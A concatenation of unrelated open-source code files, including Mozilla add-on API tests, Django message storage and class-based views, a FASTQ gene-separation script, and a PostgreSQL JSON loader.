            path=urlunquote(collection.get_url_path()))
        # Add an invalid path
        ReplacementAddon.objects.create(
            guid='notgonnawork@moz',
            path='/addon/áddonmissing/')
        response = self.client.get(reverse_ns('addon-replacement-addon'))
        assert response.status_code == 200
        data = json.loads(response.content)
        results = data['results']
        assert len(results) == 3
        # An add-on path resolves to that add-on's guid; a collection path
        # resolves to every add-on in the collection; an unresolvable path
        # yields an empty replacement list rather than an error.
        assert ({'guid': 'legacy2addon@moz',
                 'replacement': [rep_addon1.guid]} in results)
        assert ({'guid': 'legacy2collection@moz',
                 'replacement': [rep_addon2.guid, rep_addon3.guid]} in results)
        assert ({'guid': 'notgonnawork@moz',
                 'replacement': []} in results)
class TestCompatOverrideView(TestCase):
    """Tests for the compat-override lookup endpoint (?guid=...)."""
    client_class = APITestClient

    def setUp(self):
        # One override linked to a real add-on, one standalone by guid only;
        # each needs at least one CompatOverrideRange to be meaningful.
        self.addon = addon_factory(guid='extrabad@thing')
        self.override_addon = CompatOverride.objects.create(
            name='override with addon', guid=self.addon.guid, addon=self.addon)
        CompatOverrideRange.objects.create(
            compat=self.override_addon, app=amo.FIREFOX.id)
        self.override_without = CompatOverride.objects.create(
            name='override no addon', guid='bad@thing')
        CompatOverrideRange.objects.create(
            compat=self.override_without, app=amo.FIREFOX.id)

    def test_single_guid(self):
        response = self.client.get(
            reverse_ns('addon-compat-override'),
            data={'guid': u'extrabad@thing'})
        assert response.status_code == 200
        data = json.loads(response.content)
        assert len(data['results']) == 1
        result = data['results'][0]
        assert result['addon_guid'] == 'extrabad@thing'
        assert result['addon_id'] == self.addon.id
        assert result['name'] == 'override with addon'

    def test_multiple_guid(self):
        # Comma-separated guids are all looked up in one request.
        response = self.client.get(
            reverse_ns('addon-compat-override'),
            data={'guid': u'extrabad@thing,bad@thing'})
        assert response.status_code == 200
        data = json.loads(response.content)
        results = data['results']
        assert len(results) == 2
        # addon_id is None for overrides not linked to an add-on record.
        assert results[0]['addon_guid'] == 'bad@thing'
        assert results[0]['addon_id'] is None
        assert results[0]['name'] == 'override no addon'
        assert results[1]['addon_guid'] == 'extrabad@thing'
        assert results[1]['addon_id'] == self.addon.id
        assert results[1]['name'] == 'override with addon'
        # Throw in some random invalid guids too that will be ignored.
        response = self.client.get(
            reverse_ns('addon-compat-override'),
            data={'guid': (
                u'extrabad@thing,invalid@guid,notevenaguid$,bad@thing')})
        assert response.status_code == 200
        data = json.loads(response.content)
        results = data['results']
        assert len(results) == 2
        assert results[0]['addon_guid'] == 'bad@thing'
        assert results[1]['addon_guid'] == 'extrabad@thing'

    def test_no_guid_param(self):
        response = self.client.get(
            reverse_ns('addon-compat-override'),
            data={'guid': u'invalid@thing'})
        # Searching for non-matching guids, it should be an empty 200 response.
        assert response.status_code == 200
        assert len(json.loads(response.content)['results']) == 0
        response = self.client.get(
            reverse_ns('addon-compat-override'), data={'guid': ''})
        # Empty query is a 400 because a guid is required for overrides.
        assert response.status_code == 400
        assert 'Empty, or no, guid parameter provided.' in response.content
        response = self.client.get(
            reverse_ns('addon-compat-override'))
        # And no guid param should be a 400 too
        assert response.status_code == 400
        assert 'Empty, or no, guid parameter provided.' in response.content
class TestAddonRecommendationView(ESTestCase):
    """Tests for the recommendations endpoint backed by Elasticsearch.

    The recommendation service itself is mocked out; the tests drive the
    ES lookup that turns recommended guids into full add-on results.
    """
    client_class = APITestClient
    fixtures = ['base/users']

    def setUp(self):
        super(TestAddonRecommendationView, self).setUp()
        self.url = reverse_ns('addon-recommendations')
        # Replace the external recommendation call for the whole test.
        patcher = mock.patch(
            'olympia.addons.views.get_addon_recommendations')
        self.get_recommendations_mock = patcher.start()
        self.addCleanup(patcher.stop)

    def tearDown(self):
        super(TestAddonRecommendationView, self).tearDown()
        self.empty_index('default')
        self.refresh()

    def perform_search(self, url, data=None, expected_status=200, **headers):
        # The endpoint is ES-only: it must not hit the database at all.
        with self.assertNumQueries(0):
            response = self.client.get(url, data, **headers)
        assert response.status_code == expected_status, response.content
        data = json.loads(response.content)
        return data

    def test_basic(self):
        # Results come back in the order the recommendation service
        # returned the guids.
        addon1 = addon_factory(id=101, guid='101@mozilla')
        addon2 = addon_factory(id=102, guid='102@mozilla')
        addon3 = addon_factory(id=103, guid='103@mozilla')
        addon4 = addon_factory(id=104, guid='104@mozilla')
        self.get_recommendations_mock.return_value = (
            ['101@mozilla', '102@mozilla', '103@mozilla', '104@mozilla'],
            'recommended', 'no_reason')
        self.refresh()
        data = self.perform_search(
            self.url, {'guid': 'foo@baa', 'recommended': 'False'})
        self.get_recommendations_mock.assert_called_with('foo@baa', False)
        assert data['outcome'] == 'recommended'
        assert data['fallback_reason'] == 'no_reason'
        assert data['count'] == 4
        assert len(data['results']) == 4
        result = data['results'][0]
        assert result['id'] == addon1.pk
        assert result['guid'] == '101@mozilla'
        result = data['results'][1]
        assert result['id'] == addon2.pk
        assert result['guid'] == '102@mozilla'
        result = data['results'][2]
        assert result['id'] == addon3.pk
        assert result['guid'] == '103@mozilla'
        result = data['results'][3]
        assert result['id'] == addon4.pk
        assert result['guid'] == '104@mozilla'

    @mock.patch('olympia.addons.views.get_addon_recommendations_invalid')
    def test_less_than_four_results(self, get_addon_recommendations_invalid):
        # When fewer than four of the recommended guids resolve to live
        # add-ons, the view falls back to the "invalid" curated list.
        addon1 = addon_factory(id=101, guid='101@mozilla')
        addon2 = addon_factory(id=102, guid='102@mozilla')
        addon3 = addon_factory(id=103, guid='103@mozilla')
        addon4 = addon_factory(id=104, guid='104@mozilla')
        addon5 = addon_factory(id=105, guid='105@mozilla')
        addon6 = addon_factory(id=106, guid='106@mozilla')
        addon7 = addon_factory(id=107, guid='107@mozilla')
        addon8 = addon_factory(id=108, guid='108@mozilla')
        self.get_recommendations_mock.return_value = (
            ['101@mozilla', '102@mozilla', '103@mozilla', '104@mozilla'],
            'recommended', None)
        get_addon_recommendations_invalid.return_value = (
            ['105@mozilla', '106@mozilla', '107@mozilla', '108@mozilla'],
            'failed', 'invalid')
        self.refresh()
        data = self.perform_search(
            self.url, {'guid': 'foo@baa', 'recommended': 'True'})
        self.get_recommendations_mock.assert_called_with('foo@baa', True)
        assert data['outcome'] == 'recommended'
        assert data['fallback_reason'] is None
        assert data['count'] == 4
        assert len(data['results']) == 4
        result = data['results'][0]
        assert result['id'] == addon1.pk
        assert result['guid'] == '101@mozilla'
        result = data['results'][1]
        assert result['id'] == addon2.pk
        assert result['guid'] == '102@mozilla'
        result = data['results'][2]
        assert result['id'] == addon3.pk
        assert result['guid'] == '103@mozilla'
        result = data['results'][3]
        assert result['id'] == addon4.pk
        assert result['guid'] == '104@mozilla'
        # Delete one of the add-ons returned, making us use curated fallbacks
        addon1.delete()
        self.refresh()
        data = self.perform_search(
            self.url, {'guid': 'foo@baa', 'recommended': 'True'})
        self.get_recommendations_mock.assert_called_with('foo@baa', True)
        assert data['outcome'] == 'failed'
        assert data['fallback_reason'] == 'invalid'
        assert data['count'] == 4
        assert len(data['results']) == 4
        result = data['results'][0]
        assert result['id'] == addon5.pk
        assert result['guid'] == '105@mozilla'
        result = data['results'][1]
        assert result['id'] == addon6.pk
        assert result['guid'] == '106@mozilla'
        result = data['results'][2]
        assert result['id'] == addon7.pk
        assert result['guid'] == '107@mozilla'
        result = data['results'][3]
        assert result['id'] == addon8.pk
        assert result['guid'] == '108@mozilla'

    def test_es_queries_made_no_results(self):
        # Even with zero hits, exactly one ES search and no count call.
        self.get_recommendations_mock.return_value = (
            ['@a', '@b'], 'foo', 'baa')
        with patch.object(
                Elasticsearch, 'search',
                wraps=amo.search.get_es().search) as search_mock:
            with patch.object(
                    Elasticsearch, 'count',
                    wraps=amo.search.get_es().count) as count_mock:
                data = self.perform_search(self.url, data={'guid': '@foo'})
                assert data['count'] == 0
                assert len(data['results']) == 0
                assert search_mock.call_count == 1
                assert count_mock.call_count == 0

    def test_es_queries_made_results(self):
        # With hits, still exactly one ES search and no count call.
        addon_factory(slug='foormidable', name=u'foo', guid='@a')
        addon_factory(slug='foobar', name=u'foo', guid='@b')
        addon_factory(slug='fbar', name=u'foo', guid='@c')
        addon_factory(slug='fb', name=u'foo', guid='@d')
        self.refresh()
        self.get_recommendations_mock.return_value = (
            ['@a', '@b', '@c', '@d'], 'recommended', None)
        with patch.object(
                Elasticsearch, 'search',
                wraps=amo.search.get_es().search) as search_mock:
            with patch.object(
                    Elasticsearch, 'count',
                    wraps=amo.search.get_es().count) as count_mock:
                data = self.perform_search(
                    self.url, data={'guid': '@foo', 'recommended': 'true'})
                assert data['count'] == 4
                assert len(data['results']) == 4
                assert search_mock.call_count == 1
                assert count_mock.call_count == 0
|
lavish205/olympia
|
src/olympia/addons/tests/test_views.py
|
Python
|
bsd-3-clause
| 160,052
|
# coding: utf-8
# Copyright (C) 2017 Open Path View, Maison Du Libre
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License along
# with this program. If not, see <http://www.gnu.org/licenses/>.
# Contributors: Benjamin BERNARD <benjamin.bernard@openpathview.fr>
# Email: team@openpathview.fr
# Description: Utils for makelot.
def bit_len(int_type: int) -> int:
    """
    Returns int_type length, position of last non 0 bit.

    Delegates to ``int.bit_length()``, which is the exact built-in
    equivalent of the original shift-and-count loop for non-negative
    input, and — unlike the loop — also terminates for negative input
    (right-shifting a negative int preserves the sign bit, so the old
    ``while int_type: int_type >>= 1`` never reached 0).

    :param int_type: An int value.
    :type int_type: int
    :return: position of last non 0 bit (0 for an input of 0).
    :rtype: int
    """
    return int_type.bit_length()
|
OpenPathView/batchPanoMaker
|
opv_import/helpers/bit_utils.py
|
Python
|
gpl-3.0
| 1,156
|
from django.views.generic import ListView, DetailView, CreateView, \
DeleteView, UpdateView, \
ArchiveIndexView, DateDetailView, \
DayArchiveView, MonthArchiveView, \
TodayArchiveView, WeekArchiveView, \
YearArchiveView
from baseapp.models import Class_Studying
from django.contrib import auth, messages
class Class_StudyingView(object):
    # Shared base for every Class_Studying CBV: pins the model and nests
    # template lookups under a class_studying/ subdirectory.
    model = Class_Studying

    def get_template_names(self):
        """Nest templates within class_studying directory."""
        tpl = super(Class_StudyingView, self).get_template_names()[0]
        app = self.model._meta.app_label
        mdl = 'class_studying'
        # e.g. 'baseapp/x.html' -> 'baseapp/class_studying/x.html'
        self.template_name = tpl.replace(app, '{0}/{1}'.format(app, mdl))
        return [self.template_name]
class Class_StudyingDateView(Class_StudyingView):
    # Common configuration for the date-based archive views below.
    date_field = 'created_date'  # model field used for date filtering
    month_format = '%m'  # months in URLs are zero-padded numbers
class Class_StudyingBaseListView(Class_StudyingView):
    # Common pagination for all list-style views.
    paginate_by = 10
class Class_StudyingArchiveIndexView(
        Class_StudyingDateView, Class_StudyingBaseListView, ArchiveIndexView):
    # Top-level date archive (newest first).

    def get_success_url(self):
        from django.core.urlresolvers import reverse
        return reverse('baseapp_class_studying_list')
class Class_StudyingCreateView(Class_StudyingView, CreateView):

    def get_success_url(self):
        # Flash a success message, then return to the list view.
        from django.core.urlresolvers import reverse
        messages.add_message(
            self.request,
            messages.SUCCESS,"Successfully created."
        )
        return reverse('baseapp_class_studying_list')
class Class_StudyingDateDetailView(Class_StudyingDateView, DateDetailView):
    # Detail view addressed by date components in the URL.

    def get_success_url(self):
        from django.core.urlresolvers import reverse
        return reverse('baseapp_class_studying_list')
class Class_StudyingDayArchiveView(
        Class_StudyingDateView, Class_StudyingBaseListView, DayArchiveView):
    # Archive of objects created on a single day.

    def get_success_url(self):
        from django.core.urlresolvers import reverse
        return reverse('baseapp_class_studying_list')
class Class_StudyingDeleteView(Class_StudyingView, DeleteView):

    def get_success_url(self):
        # After deletion, go back to the list view.
        from django.core.urlresolvers import reverse
        return reverse('baseapp_class_studying_list')
class Class_StudyingDetailView(Class_StudyingView, DetailView):

    def get_success_url(self):
        from django.core.urlresolvers import reverse
        return reverse('baseapp_class_studying_list')
class Class_StudyingListView(Class_StudyingBaseListView, ListView):
    # Plain paginated list of Class_Studying objects.

    def get_success_url(self):
        from django.core.urlresolvers import reverse
        return reverse('baseapp_class_studying_list')
class Class_StudyingMonthArchiveView(
        Class_StudyingDateView, Class_StudyingBaseListView, MonthArchiveView):
    # Archive of objects created in a given month.

    def get_success_url(self):
        from django.core.urlresolvers import reverse
        return reverse('baseapp_class_studying_list')
class Class_StudyingTodayArchiveView(
        Class_StudyingDateView, Class_StudyingBaseListView, TodayArchiveView):
    # Archive of objects created today.

    def get_success_url(self):
        from django.core.urlresolvers import reverse
        return reverse('baseapp_class_studying_list')
class Class_StudyingUpdateView(Class_StudyingView, UpdateView):

    def get_success_url(self):
        from django.core.urlresolvers import reverse
        return reverse('baseapp_class_studying_list')
class Class_StudyingWeekArchiveView(
        Class_StudyingDateView, Class_StudyingBaseListView, WeekArchiveView):
    # Archive of objects created in a given week.

    def get_success_url(self):
        from django.core.urlresolvers import reverse
        return reverse('baseapp_class_studying_list')
class Class_StudyingYearArchiveView(
        Class_StudyingDateView, Class_StudyingBaseListView, YearArchiveView):
    # make_object_list=True also renders the full object list for the year,
    # not just the list of months that have entries.
    make_object_list = True
|
tnemis/staging-server
|
baseapp/views/class_studying_views.py
|
Python
|
mit
| 3,912
|
from authenticated import AuthenticatedHandler
import models
import logging
class EditPage(AuthenticatedHandler):
    """Wiki page edit handler: GET shows the edit form, POST saves a revision.

    Both verbs require authentication (enforced by AuthenticatedHandler,
    which dispatches to auth_get / auth_post).
    """

    def auth_get(self, page_path):
        # Render the edit form for the requested page path.
        self.render_form(page_path)

    def auth_post(self, page_path):
        # 'v' optionally pins the page version being edited.
        page_id = self.request.get('v')
        page_content = self.request.get('content')
        wikipage = models.WikiPage.by_path_or_id(page_path, page_id)
        if wikipage and page_content == wikipage.content:
            # Content unchanged -> don't create a redundant revision.
            self.redirect(page_path)
            return
        # Each save creates a new WikiPage revision attributed to the
        # current account.
        models.WikiPage.create(page_path = page_path, page_content = page_content,
                               author = self.account)
        self.redirect(page_path)

    def render_form(self, page_path):
        # 'v' selects a specific version to edit; missing/empty means latest.
        version = self.request.get('v')
        wikipage = models.WikiPage.by_path_or_id(page_path, version)
        self.render('edit_page',
                    editing = True,
                    page_title = 'WikiPage: %s' % page_path,
                    page_path = page_path,
                    page_version = version,
                    # Empty editor body when the page does not exist yet.
                    page_html = wikipage.content if wikipage else '',
                    is_new_page = not wikipage)
|
zxul767/Wikipages
|
edit.py
|
Python
|
gpl-2.0
| 1,154
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Script to separate genes from MiSeq run fastQ files (NEXTERA style)
AFTER the reads have been trimmed for the tail and adapter (see trim_adaptors.py)
Trim forward and reverse primers.
It will produce one file for each gene (4 here - 16S, 18S, UPA, tufA)
Created on Mon Jul 28 17:27:33 2014
@author: VanessaRM
"""
""" USAGE:
python speratae_genes.py my_fastq_file.fastq
"""
from Bio import SeqIO
import regex
import sys
# Help text
# NOTE: this is a Python 2 script (bare print statements throughout).
# With no CLI argument, print usage instructions and exit.
if len(sys.argv) == 1:
    print ""
    print "Script to separate genes and trim primers from a fastQ file."
    print "Allows one mismatch in the primer sequence"
    print ""
    print "Usage: supply the file name"
    print "ex: python speratae_genes.py my_fastq_file.fastq"
    print ""
    print "If you want to run it for multiple files, use the shell:"
    print "for file in *_R1_001.fastq; do python separate_genes.py $file; done >> screen.out 2>> screen.err &"
    print ""
    sys.exit()
# input files and arguments:
input_file = str(sys.argv[1])
# One output file per amplicon, plus one for reads matching no primer.
output_file_16S = input_file + "_16S.fastq"
output_file_18S = input_file + "_18S.fastq"
output_file_UPA = input_file + "_UPA.fastq"
output_file_tufA = input_file + "_tufA.fastq"
output_file_umatched = input_file + "_unmatched.fastq"
# Globals
finder = ""  # NOTE(review): appears unused below
# Create lists to store seqs
#all_seqs =[] #just to see if the code behaves well
# Module-level buckets filled by primer_finder() and written out at the end.
s16_list =[]
s18_list = []
UPA_list=[]
tufA_list =[]
unmatched=[]
# Forward Primers (\w = ambiguous positions, only 12 "internal" bases used), allowing for 1 mismatch.
# The {e<=1} suffix is the third-party `regex` module's fuzzy-matching
# syntax: at most one edit (substitution/insertion/deletion).
p16S_f = '(GTGCCAGC\wGCCGCGGTAA){e<=1}' #F515
p18S_f = '(GGTGGTGCATGGCCGTTCTTAGTT){e<=1}' #NF1
pUPA_f = '(GGACAGAAAGACCCTATGAA){e<=1}' #p23SrV_f1
ptufA_f = '(AC\wGG\wCG\wGG\wAC\wGT){e<=1}' #Oq_tuf2F
#Reverse primers(their reverse complement):
p16S_r = '(ATTAGA\wACCC\w\wGTAGTCC){e<=1}' #R806 rc ATTAGAWACCCBDGTAGTCC
p18S_r = '(ATTACGTCCCTGCCCTTTGTA){e<=1}' # B18Sr2B rc
pUPA_r = '(CTCTAGGGATAACAGGCTGA){e<=1}' #p23SrV_r1 rc
ptufA_r = '(GCG\wTT\wGC\wATTCG\wGAAGG){e<=1}' #tufAR rc
#define primer_finder function
def primer_finder (records, primer_f1, primer_r1, primer_f2, primer_r2, primer_f3, primer_r3, primer_f4, primer_r4):
"Trims the primers and saves the sequences in amplicon-separated files. Put primers in order: 16S, 18S, UPA, tufA"
for record in records:
sequence = str(record.seq)
#Initial values of cut_off - in case you don't need to trim anything
cut_off_f= 0
cut_off_r = len(sequence)
#Search the primers f and r
index_f = regex.search((primer_f1), sequence)
index_r = regex.search((primer_r1), sequence)
if index_f != None:
#found the forward primer, so define where the sequence needs to be trimmed
cut_off_f = int(index_f.span()[1])
if index_r != None:
#found the reverse primer
cut_off_r = int(index_r.span()[0]+1) #the +1 is to cut just when the primer starts.
#Store the trimmed seq
if index_f or index_r != None:
s16_list.append(record [cut_off_f:cut_off_r])
else: #search for next primer
index_f = regex.search((primer_f2), sequence)
index_r = regex.search((primer_r2), sequence)
if index_f != None:
cut_off_f = int(index_f.span()[1])
if index_r != None:
cut_off_r = int(index_r.span()[0]+1)
if index_f or index_r != None:
s18_list.append(record [cut_off_f:cut_off_r])
else:
index_f = regex.search((primer_f3), sequence)
index_r = regex.search((primer_r3), sequence)
if index_f != None:
cut_off_f = int(index_f.span()[1])
if index_r != None:
cut_off_r = int(index_r.span()[0]+1)
if index_f or index_r != None:
UPA_list.append(record [cut_off_f:cut_off_r])
else:
index_f = regex.search((primer_f4), sequence)
index_r = regex.search((primer_r4), sequence)
if index_f != None:
cut_off_f = int(index_f.span()[1])
if index_r != None:
cut_off_r = int(index_r.span()[0]+1)
if index_f or index_r != None:
tufA_list.append(record [cut_off_f:cut_off_r])
else:
unmatched.append(record)
#Iterate over fastq file
print ("separating genes... It can take a while...")
original_reads = SeqIO.parse(input_file, "fastq")
# primer_finder fills the module-level lists as a side effect (returns None).
do_it = primer_finder(original_reads,p16S_f,p16S_r,p18S_f,p18S_r,pUPA_f,pUPA_r,ptufA_f,ptufA_r)
# Write each bucket to its own fastq file; SeqIO.write returns the count.
count_um = SeqIO.write(unmatched, output_file_umatched, "fastq")
print ""
print "%i sequences did not match the primers and were stored in the %s file." %(count_um, output_file_umatched)
print ""
count_16S = SeqIO.write(s16_list, output_file_16S, "fastq")
print"",
print "Saved %i reads in the %s file." %(count_16S, output_file_16S)
count_18S = SeqIO.write(s18_list, output_file_18S, "fastq")
print""
print "Saved %i reads in the %s file." %(count_18S, output_file_18S)
count_UPA = SeqIO.write(UPA_list, output_file_UPA, "fastq")
print""
print "Saved %i reads in the %s file." %(count_UPA, output_file_UPA)
count_tufA = SeqIO.write(tufA_list, output_file_tufA, "fastq")
print""
print "Saved %i reads in the %s file." %(count_tufA, output_file_tufA)
print""
print "Done!"
|
vrmarcelino/Shape-4-Qiime
|
separate_genes.py
|
Python
|
mit
| 5,655
|
from __future__ import unicode_literals
from django.conf import settings
from django.utils.encoding import force_text, python_2_unicode_compatible
from django.contrib.messages import constants, utils
LEVEL_TAGS = utils.get_level_tags()
@python_2_unicode_compatible
class Message(object):
    """
    A single user-facing message, storable in any of the supported
    message-storage backends (typically session- or cookie-based) and
    renderable in a view or template.
    """

    def __init__(self, level, message, extra_tags=None):
        self.level = int(level)
        self.message = message
        self.extra_tags = extra_tags

    def _prepare(self):
        """
        Resolve ``message`` and ``extra_tags`` to unicode ahead of
        serialization, so lazy translations are evaluated now. Known "safe"
        types (None, int, etc.) pass through unchanged thanks to
        ``strings_only`` (see Django's ``force_text`` for details).
        """
        self.message = force_text(self.message, strings_only=True)
        self.extra_tags = force_text(self.extra_tags, strings_only=True)

    def __eq__(self, other):
        if not isinstance(other, Message):
            return False
        return self.level == other.level and self.message == other.message

    def __str__(self):
        return force_text(self.message)

    def _get_tags(self):
        # Join the per-message extra tags with the tag derived from the
        # message level, skipping whichever is empty.
        extra_tags = force_text(self.extra_tags, strings_only=True)
        label_tag = force_text(LEVEL_TAGS.get(self.level, ''),
                               strings_only=True)
        if extra_tags and label_tag:
            return ' '.join([extra_tags, label_tag])
        if extra_tags:
            return extra_tags
        if label_tag:
            return label_tag
        return ''

    tags = property(_get_tags)
class BaseStorage(object):
    """
    This is the base backend for temporary message storage.

    This is not a complete class; to be a usable storage backend, it must be
    subclassed and the two methods ``_get`` and ``_store`` overridden.
    """

    def __init__(self, request, *args, **kwargs):
        self.request = request
        self._queued_messages = []  # messages added during this request
        self.used = False       # set True once the storage is iterated
        self.added_new = False  # set True once add() queues a message
        super(BaseStorage, self).__init__(*args, **kwargs)

    def __len__(self):
        return len(self._loaded_messages) + len(self._queued_messages)

    def __iter__(self):
        # Iterating marks the storage as "used": update() will then persist
        # only messages queued after this point, not the ones displayed.
        self.used = True
        if self._queued_messages:
            self._loaded_messages.extend(self._queued_messages)
            self._queued_messages = []
        return iter(self._loaded_messages)

    def __contains__(self, item):
        return item in self._loaded_messages or item in self._queued_messages

    @property
    def _loaded_messages(self):
        """
        Returns a list of loaded messages, retrieving them first if they have
        not been loaded yet.
        """
        if not hasattr(self, '_loaded_data'):
            # Backend fetch happens at most once per request.
            messages, all_retrieved = self._get()
            self._loaded_data = messages or []
        return self._loaded_data

    def _get(self, *args, **kwargs):
        """
        Retrieves a list of stored messages. Returns a tuple of the messages
        and a flag indicating whether or not all the messages originally
        intended to be stored in this storage were, in fact, stored and
        retrieved; e.g., ``(messages, all_retrieved)``.

        **This method must be implemented by a subclass.**

        If it is possible to tell if the backend was not used (as opposed to
        just containing no messages) then ``None`` should be returned in
        place of ``messages``.
        """
        raise NotImplementedError('subclasses of BaseStorage must provide a _get() method')

    def _store(self, messages, response, *args, **kwargs):
        """
        Stores a list of messages, returning a list of any messages which could
        not be stored.

        One type of object must be able to be stored, ``Message``.

        **This method must be implemented by a subclass.**
        """
        raise NotImplementedError('subclasses of BaseStorage must provide a _store() method')

    def _prepare_messages(self, messages):
        """
        Prepares a list of messages for storage.
        """
        for message in messages:
            message._prepare()

    def update(self, response):
        """
        Stores all unread messages.

        If the backend has yet to be iterated, previously stored messages will
        be stored again. Otherwise, only messages added after the last
        iteration will be stored.
        """
        self._prepare_messages(self._queued_messages)
        if self.used:
            # Displayed messages are dropped; only newly queued ones persist.
            return self._store(self._queued_messages, response)
        elif self.added_new:
            messages = self._loaded_messages + self._queued_messages
            return self._store(messages, response)

    def add(self, level, message, extra_tags=''):
        """
        Queues a message to be stored.

        The message is only queued if it contained something and its level is
        not less than the recording level (``self.level``).
        """
        if not message:
            return
        # Check that the message level is not less than the recording level.
        level = int(level)
        if level < self.level:
            return
        # Add the message.
        self.added_new = True
        message = Message(level, message, extra_tags=extra_tags)
        self._queued_messages.append(message)

    def _get_level(self):
        """
        Returns the minimum recorded level.

        The default level is the ``MESSAGE_LEVEL`` setting. If this is
        not found, the ``INFO`` level is used.
        """
        if not hasattr(self, '_level'):
            self._level = getattr(settings, 'MESSAGE_LEVEL', constants.INFO)
        return self._level

    def _set_level(self, value=None):
        """
        Sets a custom minimum recorded level.

        If set to ``None``, the default level will be used (see the
        ``_get_level`` method).
        """
        if value is None and hasattr(self, '_level'):
            del self._level
        else:
            self._level = int(value)

    # The deleter is _set_level on purpose: ``del storage.level`` (i.e.
    # calling it with no value) resets back to the default level.
    level = property(_get_level, _set_level, _set_level)
|
ericholscher/django
|
django/contrib/messages/storage/base.py
|
Python
|
bsd-3-clause
| 6,265
|
# The main entrance for the optimization framework of energy router
T = 24  # number of scheduling periods; presumably 24 one-hour slots — TODO confirm
|
Matrixeigs/Optimization
|
main.py
|
Python
|
mit
| 76
|
#python
# Benchmark driver: runs the shared bitmap-modifier benchmark harness
# against the "CUDABitmapMultiply" modifier.
import testing
testing.bitmap_modifier_benchmark("CUDABitmapMultiply")
|
barche/k3d
|
tests/bitmap/bitmap.modifier.CUDABitmapMultiply.benchmark.py
|
Python
|
gpl-2.0
| 81
|
#!/usr/bin/env python3
import json
import psycopg2
def drop_tables(db, user):
    """Drop the issues, repos and labels tables if they exist.

    issues is dropped before repos because it references repos(id).

    :param db: database name passed to psycopg2.connect.
    :param user: database user.
    """
    print('droping tables')
    sql_drop_repos_table = 'DROP TABLE IF EXISTS repos'
    sql_drop_issues_table = 'DROP TABLE IF EXISTS issues'
    sql_drop_labels_table = 'DROP TABLE IF EXISTS labels'
    # Pre-initialize so the finally block is safe even when connect()
    # itself raises; the original code hit a NameError there in that case.
    conn = None
    cur = None
    try:
        conn = psycopg2.connect(database=db, user=user)
        cur = conn.cursor()
        cur.execute(sql_drop_issues_table)
        cur.execute(sql_drop_repos_table)
        cur.execute(sql_drop_labels_table)
    except psycopg2.DatabaseError as e:
        # Best-effort: report and continue without committing.
        print(e)
    else:
        conn.commit()
    finally:
        if cur:
            cur.close()
        if conn:
            conn.close()
    print('tables dropped\n')
def create_repos_table(db, user, json_fpath):
    """Create the repos table and load it from a JSON dump.

    :param db: database name passed to psycopg2.connect.
    :param user: database user.
    :param json_fpath: path to a JSON list of repo objects; each must have
        an 'id' key, and the whole object is stored as jsonb.
    """
    print('creating repos table')
    with open(json_fpath, 'r') as f:
        repos = json.load(f)
    # Pre-initialize so the finally block never hits a NameError when
    # connect() itself fails (the original called cur.close() blindly).
    conn = None
    cur = None
    try:
        conn = psycopg2.connect(database=db, user=user)
        cur = conn.cursor()
        sql_create_table = ('CREATE TABLE repos (id integer PRIMARY KEY, data jsonb);')
        cur.execute(sql_create_table)
        for r in repos:
            sql_insert = 'INSERT INTO repos (id, data) VALUES (%s, %s::jsonb) ON CONFLICT DO NOTHING;'
            cur.execute(sql_insert, (r['id'], json.dumps(r),))
    except psycopg2.DatabaseError as e:
        print(e)
    else:
        conn.commit()
    finally:
        if cur:
            cur.close()
        if conn:
            conn.close()
    print('repos table created\n')
def create_issues_table(db, user, json_fpath):
    """Create the issues table (FK to repos) and load it from a JSON dump.

    Must run after create_repos_table: repo_id references repos(id).

    :param db: database name passed to psycopg2.connect.
    :param user: database user.
    :param json_fpath: path to a JSON list of issue objects; each must have
        'id' and 'repo_id' keys, and the whole object is stored as jsonb.
    """
    print('creating issues table')
    with open(json_fpath, 'r') as f:
        issues = json.load(f)
    # Pre-initialize so the finally block never hits a NameError when
    # connect() itself fails (the original called cur.close() blindly).
    conn = None
    cur = None
    try:
        conn = psycopg2.connect(database=db, user=user)
        cur = conn.cursor()
        sql_create_table = 'CREATE TABLE issues (id integer PRIMARY KEY, repo_id integer REFERENCES repos(id), data jsonb);'
        cur.execute(sql_create_table)
        for i in issues:
            sql_insert = 'INSERT INTO issues (id, repo_id, data) VALUES (%s, %s, %s::jsonb) ON CONFLICT DO NOTHING;'
            cur.execute(sql_insert, (i['id'], i['repo_id'], json.dumps(i),))
    except psycopg2.DatabaseError as e:
        print(e)
    else:
        conn.commit()
    finally:
        if cur:
            cur.close()
        if conn:
            conn.close()
    print('issues table created\n')
def create_labels_table(db, user, json_fpath):
    """Create the labels table and load label names from a JSON dump.

    :param db: database name passed to psycopg2.connect.
    :param user: database user.
    :param json_fpath: path to a JSON list of label name strings; ids are
        assigned by the serial primary key.
    """
    print('creating labels table')
    with open(json_fpath, 'r') as f:
        labels = json.load(f)
    # Pre-initialize so the finally block never hits a NameError when
    # connect() itself fails (the original called cur.close() blindly).
    conn = None
    cur = None
    try:
        conn = psycopg2.connect(database=db, user=user)
        cur = conn.cursor()
        sql_create_table = 'CREATE TABLE labels (id serial PRIMARY KEY, name varchar);'
        cur.execute(sql_create_table)
        for l in labels:
            sql_insert = 'INSERT INTO labels (name) VALUES (%s) ON CONFLICT DO NOTHING;'
            cur.execute(sql_insert, (l,))
    except psycopg2.DatabaseError as e:
        print(e)
    else:
        conn.commit()
    finally:
        if cur:
            cur.close()
        if conn:
            conn.close()
    print('labels table created\n')
if __name__ == '__main__':
    print('===== DB Creation Start =====')
    # conn = psycopg2.connect('dbname=db user=user host=localhost password=xxx')
    # Connection settings come from config.json: {"db": ..., "user": ...}.
    with open('./config.json', 'r') as f:
        config = json.load(f)
    db = config['db']
    user = config['user']
    # Rebuild all three tables from the JSON dumps under ./data/.
    # Order matters: issues references repos, labels is independent.
    drop_tables(db, user)
    create_repos_table(db, user, './data/repos.json')
    create_issues_table(db, user, './data/issues.json')
    create_labels_table(db, user, './data/labels.json')
    print('===== DB Creation Complete =====')
|
JmeHsieh/issue_aggregator
|
j2jb.py
|
Python
|
mit
| 3,496
|
# encoding: utf-8
from lxml.etree import LIBXML_VERSION
import pytest
from libweasyl.text import markdown, markdown_excerpt, markdown_link
# Expected-failure marker for tests whose output depends on libxml2
# preserving whitespace between adjacent elements (2.9+ only).
